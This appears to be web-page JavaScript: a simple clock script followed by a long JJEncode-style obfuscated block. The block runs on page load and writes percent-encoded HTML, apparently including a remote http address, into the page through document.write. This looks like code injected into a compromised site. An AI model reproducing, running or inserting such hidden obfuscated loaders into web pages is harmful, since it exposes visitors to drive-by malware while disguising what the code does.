<!--
var timerID = null;
var timerRunning = false;
function Stopclock () {
if(timerRunning)
clearTimeout(timerID);
timerRunning = false;
}
function Displaytime () {
var now = new Date();
var hours = now.getHours();
var minutes = now.getMinutes();
var seconds = now.getSeconds()
var sTime = "" + ((hours >12) ? hours -12 :hours)
if (sTime == "0") sTime = 12;
sTime += ((minutes < 10) ? ":0" : ":") + minutes
sTime += ((seconds < 10) ? ":0" : ":") + seconds
sTime += (hours >= 12) ? " P.M." : " A.M."
document.clock2.face.value = sTime;
timerID = setTimeout("Displaytime()",1000);
timerRunning = true;
}
function Startclock() {
Stopclock();
Displaytime();
}
// -->
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"("+$._+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$$+$.$$__+$.$_$_+"\\"+$.__$+$.$$_+$.___+$.$$$_+"(\\\"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$._$_+$.__$+"%"+$.$__+$.$__+"%"+$.$__+"\\"+$.__$+$.___+$.$$_+"%"+$.$__+$._$$+"%"+$.$_$+$.$__+"%"+$.$_$+$.$__$+"%"+$.$_$+$.___+"%"+$.$__+$.$_$+"%"+$._$_+$.___+"%"+$.$$_+$.$___+"%"+$.$$$+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$___+"%"+$.$$$+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$___+"%"+$.$$_+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$_+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$$+$.$__+"%"+$.$$_+$.__$+"%"+$._$_+$.___+"%"+$.$$_+$.$___+"%"+$.$$$+$.$__+"%"+$.$$$+$.$__+"%"+$.$$$+$.___+"%"+$._$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$$+$.__$+"%"+$.$$$+$.$_$+"%"+$.$$_+$.$__$+"%"+$.$$$+$.$$_+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$._$_+$._$_+"%"+$.$$_+$._$$+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$._$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__+"%"+$.$$$+$.$__$+"%"+$.$$$+$.___+"%"+$.$$_+$.$_$+"%"+$._$_+$._$_+"%"+$._$_+$.___+"%"+$.$$_+$._$$+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$._$_+$._$_+"%"+$.$$$+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$$+$.$___+"%"+$.$$$+$.$__+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$.$___+"%"+$.$$$+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$._$$+"\\"+$.__$+$.___+$._$_+"%"+$.$$_+$._$$+"%"+$.$$_+$.$___+"%"+$.$$_+$.__$+"%"+$.$$$+$._$_+"%"+$.$$$+$._$$+"%"+$.$$_+$.$_$+"%"+$.$$$+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$_$+"%"+$.$$$+$.$__+"%"+$.$$_+$.$$_+"%"+$._$$+$.$___+"%"+$._$_+$._$_+"%"+$._$_+$.___+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$.$___+"%"+$.$$_+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$_+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$.$__+"%"+$.$$$+$.$__$+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$.$$$+$._$$+"%"+$.$$_+$._$$+"%"+$.$$$+$._$_+"%"+$.$$_+$.$__$+"%"+$.$$$+$.___+"%"+$.$$$+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$$_+"%"+$.$$_+$.__$+"%"+$.$$$+$._$_+"%"+$._$_+$.___+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$._$_+$.___+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$._$_+$.___+"%"+$.$$_+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$.$$$+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$._$_+"%"+$.$$$+$.$$_+"%"+$.$$_+$.__$+"%"+$.$$$+$._$_+"%"+$._$_+$.___+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$.$__+$.$___+"%"+$.$$_+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$_+$.$__+"%"+$._$_+$.___+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$._$_+$.___+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$._$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$_+$.$$$+"%"+$.$$_+$.$_$+"%"+$.$$$+$.$__+"%"+$.$__+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$.$$$+$._$$+"%"+$.$__+$._$_+"%"+$.$$$+$.$__$+"%"+$.$_$+$.$__+"%"+$.$$_+$.__$+"%"+$.$$_+$.$$$+"%"+$.$__+"\\"+$.__$+$.___+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$._$_+$.$___+"%"+$._$_+$._$_+"%"+$.$$_+$.$___+"%"+$.$$_+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$_+$.$__+"%"+$._$_+$._$_+"%"+$._$_+$.$__$+"%"+$.$_$+"\\"+$.__$+$.___+$._$_+"%"+$._$$+$.___+"%"+$.$_$+"\\"+$.__$+$.___+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$._$_+"%"+$.$$$+$.$$_+"%"+$.$$_+$.__$+"%"+$.$$$+$._$_+"%"+$._$_+$.___+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$$_+"%"+$.$$_+$.$__$+"%"+$.$$$+$._$$+"%"+$.$$_+$.$__$+"%"+$.$$_+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$_$+"%"+$.$__+$.$$_+"%"+$.$$$+$._$_+"%"+$.$$_+$.__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$._$_+$.___+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$._$_+$.___+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$._$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$_+$._$$+"%"+$.$$$+$._$_+"%"+$.$$_+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$$+$.$__+"%"+$.$$_+$.$_$+"%"+$.$__+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$._$_+$.$___+"%"+$._$_+$._$_+"%"+$.$$_+$.$__$+"%"+$.$$_+$.$$_+"%"+$.$$$+$._$_+"%"+$.$$_+$.__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$._$_+$._$_+"%"+$._$_+$.$__$+"%"+$._$$+"\\"+$.__$+$.___+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$$_+"%"+$.$$_+$.$__$+"%"+$.$$$+$._$$+"%"+$.$$_+$.$__$+"%"+$.$$_+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$_$+"%"+$.$__+$.$$_+"%"+$.$$$+$._$_+"%"+$.$$_+$.__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$._$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$._$$+"%"+$.$$$+$._$_+"%"+$.$$_+$._$$+"%"+$._$$+"\\"+$.__$+$.___+$.$__+"%"+$._$_+$._$_+"%"+$.$$_+$.$___+"%"+$.$$$+$.$__+"%"+$.$$$+$.$__+"%"+$.$$$+$.___+"%"+$._$$+"\\"+$.__$+$.___+$.__$+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+"\\"+$.__$+$.___+$._$_+"%"+$.$$_+$.$_$+"%"+$.$$$+$.$__$+"%"+$.$$$+$._$$+"%"+$.$$$+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$$+$.___+"%"+$._$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$._$_+"%"+$.$$$+$.$_$+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$$+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$.$$_+$.$_$+"%"+$.$$$+$._$_+"%"+$._$$+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$$+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$__+"%"+$._$_+$._$_+"%"+$._$$+"\\"+$.__$+$.___+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$$+"%"+$.$__+$.$___+"%"+$.$$_+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$_+$.$__+"%"+$._$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$_+$.__$+"%"+$.$$$+$.___+"%"+$.$$$+$.___+"%"+$.$$_+$.$_$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$_+$.$__+"%"+$.$__+$._$$+"%"+$.$$_+$.$___+"%"+$.$$_+$.$__$+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$__+"%"+$._$_+$.$___+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$$+$.$__$+"%"+$.$__+$.$__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$_$+"%"+$.$$$+$.$$_+"%"+$.$$_+$.$__$+"%"+$.$$$+$._$$+"%"+$.$$_+$.$__$+"%"+$.$$_+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$.$$_+$.$_$+"%"+$.$__+$.$$_+"%"+$.$$$+$._$_+"%"+$.$$_+$.__$+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+$.$_$+"%"+$._$_+$.$__$+"%"+$._$$+"\\"+$.__$+$.___+$._$_+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$$+$._$$+"%"+$.$$_+$._$$+"%"+$.$$$+$._$_+"%"+$.$$_+$.$__$+"%"+$.$$$+$.___+"%"+$.$$$+$.$__+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$._$_+"%"+$.$$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$.$__+"%"+$.$$$+$.$__$+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"%"+$._$$+"\\"+$.__$+$.___+$._$$+"%"+$._$_+"\\"+$.__$+$.___+$.$$_+"%"+$.$$_+$.$___+"%"+$.$$$+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$.$__+"%"+$.$$_+"\\"+$.__$+$.___+$._$$+"%"+$._$$+"\\"+$.__$+$.___+$.$_$+"\\\"));"+"\"")())();